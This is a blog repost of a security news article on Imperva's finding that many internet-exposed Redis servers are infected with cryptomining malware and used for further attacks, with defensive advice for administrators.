java多线程    Java入门    vsftp    ftp    linux配置    centos    FRP教程    HBase    Html5缓存    webp    zabbix    分布式    neo4j图数据库    



今年早些时候,安全研究人员警告说,Apache Solr、Redis和Windows服务器可能受到加密器的攻击。












Are attackers harnessing your Redis server?

Are attackers harnessing your Redis server?

Earlier this year security researchers warned about vulnerable Apache Solr, Redis, and Windows servers hit with cryptominers.

Imperva now says that that are still too many Internet-facing Redis servers and that 75% of them show signs of having been infected with malware.

redis compromise

Testing open Redis servers
“Redis is a great tool, it can serve as in-memory distributed database, cache or a message broker and is widely popular,” the researchers note.

But Redis servers are designed to be accessed by trusted clients inside trusted environments, have not default authentication, and all the data is stored in clear text.

Unfortunately, a simple Shodan search shows that there are 72,000 publicly available ones.

And, after setting up their own honeypot Redis servers and them starting getting probed (vulnerability scans) and bombarded with attacks (simple crypto mining infections and crypto mining worms) within a day, the researchers decided to see how many of those open servers sport malicious keys and values that they saw in their honeypot data.

The result? Only 10,000 of the servers replied to their scan attempts without an error, but of those most showed signs of compromise.

Redis compromise

“Unsurprisingly, more than two-thirds of the open Redis servers contain malicious keys and three-quarters of the servers contain malicious values, suggesting that the server is infected. Also according to our honeypot data, the infected servers with ‘backup’ keys were attacked from a medium-sized botnet located at China (86% of IPs),” the researchers shared.

“In the last month alone, Imperva customers were attacked more than 75k times, by 295 IPs that run publicly available Redis servers. The attacks included SQL injection, cross-site scripting, malicious file uploads, remote code executions etc. These numbers suggest that attackers are harnessing vulnerable Redis servers to mount further attacks on the attacker’s behalf.”

They advise administrators to remove the exposed Redis servers from the Internet and check whether they have been infected. It’s also a good idea to run Redis with the minimal privileges necessary.

This entry was posted in 高并发与大数据 and tagged . Bookmark the permalink.
月小升QQ 2651044202, 技术交流QQ群 178491360

Leave a Reply